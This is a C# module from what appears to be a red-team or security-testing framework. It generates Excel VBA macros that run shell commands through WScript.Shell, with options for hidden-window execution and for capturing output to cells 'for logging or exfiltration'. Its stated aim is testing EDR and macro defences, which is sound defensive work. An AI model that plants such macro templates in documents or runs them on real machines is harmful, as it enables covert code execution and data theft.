/*
 * MODULE: Excel Command Execution
 * ID: excel-command-exec
 * DESCRIPTION: Executes shell commands via VBA Shell function or WScript.Shell
 * CATEGORY: Excel Actions
 * SUPPORTED_EXECUTION_TYPES: excel-macro
 *
 * PARAMETERS:
 * @Command|string|whoami|||placeholder=cmd.exe /c whoami,required|Command to execute via VBA Shell
 * @WindowStyle|choice|Hidden|Normal:Hidden:Minimized:Maximized||required|Window style for execution
 * @Wait|bool|false||||Wait for command to complete before continuing
 * @CaptureOutput|bool|false||||Capture command output to worksheet cells
 *
 * HOW IT WORKS:
 * This module generates VBA code that:
 * 1. Uses WScript.Shell to execute shell commands
 * 2. Can run commands with different window styles (hidden, minimized, etc.)
 * 3. Optionally waits for command completion
 * 4. Can capture output to Excel cells for logging or exfiltration
 *
 * USE CASES:
 * - Test command execution detection in Excel macro security
 * - Simulate living-off-the-land (LOL) techniques via Office apps
 * - Test EDR detection of shell spawning from Excel
 * - Validate application whitelisting and macro sandboxing
 *
 * SECURITY TESTING SCENARIOS:
 * - Hidden window execution to test stealth detection
 * - Output capture to test data exfiltration via spreadsheet
 * - Command chaining and payload staging detection
 * - Parent-child process relationship monitoring
 *
 * VBA EQUIVALENT:
 * The C# code below is converted to VBA by the ExcelMacro execution type.
 * In VBA, this becomes WScript.Shell.Run() operations.
 */

// USINGS
using System;
using System.Diagnostics;
using System.Threading.Tasks;

// CODE
Console.WriteLine("[*] Excel Command Execution Module");
Console.WriteLine($"[*] Command: {@Command}");
Console.WriteLine($"[*] Window Style: {@WindowStyle}");
Console.WriteLine($"[*] Wait for completion: {@Wait}");
Console.WriteLine($"[*] Capture output: {@CaptureOutput}");

try
{
    // In C# execution context (won't run in Excel VBA, just for reference)
    var startInfo = new ProcessStartInfo
    {
        FileName = "cmd.exe",
        Arguments = $"/c {@Command}",
        UseShellExecute = false,
        RedirectStandardOutput = @CaptureOutput,
        RedirectStandardError = @CaptureOutput,
        CreateNoWindow = @WindowStyle == "Hidden"
    };

    // Map window style
    startInfo.WindowStyle = @WindowStyle switch
    {
        "Hidden" => ProcessWindowStyle.Hidden,
        "Minimized" => ProcessWindowStyle.Minimized,
        "Maximized" => ProcessWindowStyle.Maximized,
        _ => ProcessWindowStyle.Normal
    };

    Console.WriteLine("[*] Starting process...");
    using var process = Process.Start(startInfo);

    if (process != null)
    {
        Console.WriteLine($"[+] Process started with PID: {process.Id}");

        if (@Wait)
        {
            Console.WriteLine("[*] Waiting for process to complete...");
            await process.WaitForExitAsync();
            Console.WriteLine($"[+] Process exited with code: {process.ExitCode}");

            if (@CaptureOutput)
            {
                var output = await process.StandardOutput.ReadToEndAsync();
                var error = await process.StandardError.ReadToEndAsync();

                Console.WriteLine("[*] === Command Output ===");
                if (!string.IsNullOrEmpty(output))
                {
                    Console.WriteLine(output);
                }
                if (!string.IsNullOrEmpty(error))
                {
                    Console.WriteLine("[!] === Error Output ===");
                    Console.WriteLine(error);
                }

                Console.WriteLine("[*] In Excel VBA, this output would be written to worksheet cells");
            }
        }
        else
        {
            Console.WriteLine("[*] Process started asynchronously (not waiting for completion)");
        }
    }
    else
    {
        Console.WriteLine("[-] Failed to start process");
    }
}
catch (Exception ex)
{
    Console.WriteLine($"[-] Error executing command: {ex.Message}");
}

/*
 * VBA CONVERSION NOTES:
 * The ExcelMacro execution type converts this to VBA code similar to:
 *
 * Sub ExecuteCommand()
 *     Dim wsh As Object
 *     Dim exitCode As Integer
 *     Set wsh = CreateObject("WScript.Shell")
 *
 *     ' Window styles: 0 = Hidden, 1 = Normal, 2 = Minimized, 3 = Maximized
 *     ' Wait parameter: true = wait, false = don't wait
 *     exitCode = wsh.Run("cmd.exe /c whoami", 0, true)
 *
 *     If CaptureOutput then
 *         ' Write exit code to cell
 *         ThisWorkbook.Worksheets(1).Range("A1").Value = "Exit Code: " & exitCode
 *     End If
 *
 *     Set wsh = Nothing
 * End Sub
 *
 * For capturing actual output (not just exit code), VBA requires:
 * - Using WScript.Shell.Exec() instead of Run()
 * - Reading from StdOut stream
 * - More complex implementation with stream handling
 *
 * Example with output capture:
 * Set exec = wsh.Exec("cmd.exe /c whoami")
 * Do While exec.Status = 0
 *     DoEvents
 * Loop
 * output = exec.StdOut.ReadAll()
 * ThisWorkbook.Worksheets(1).Range("A1").Value = output
 */
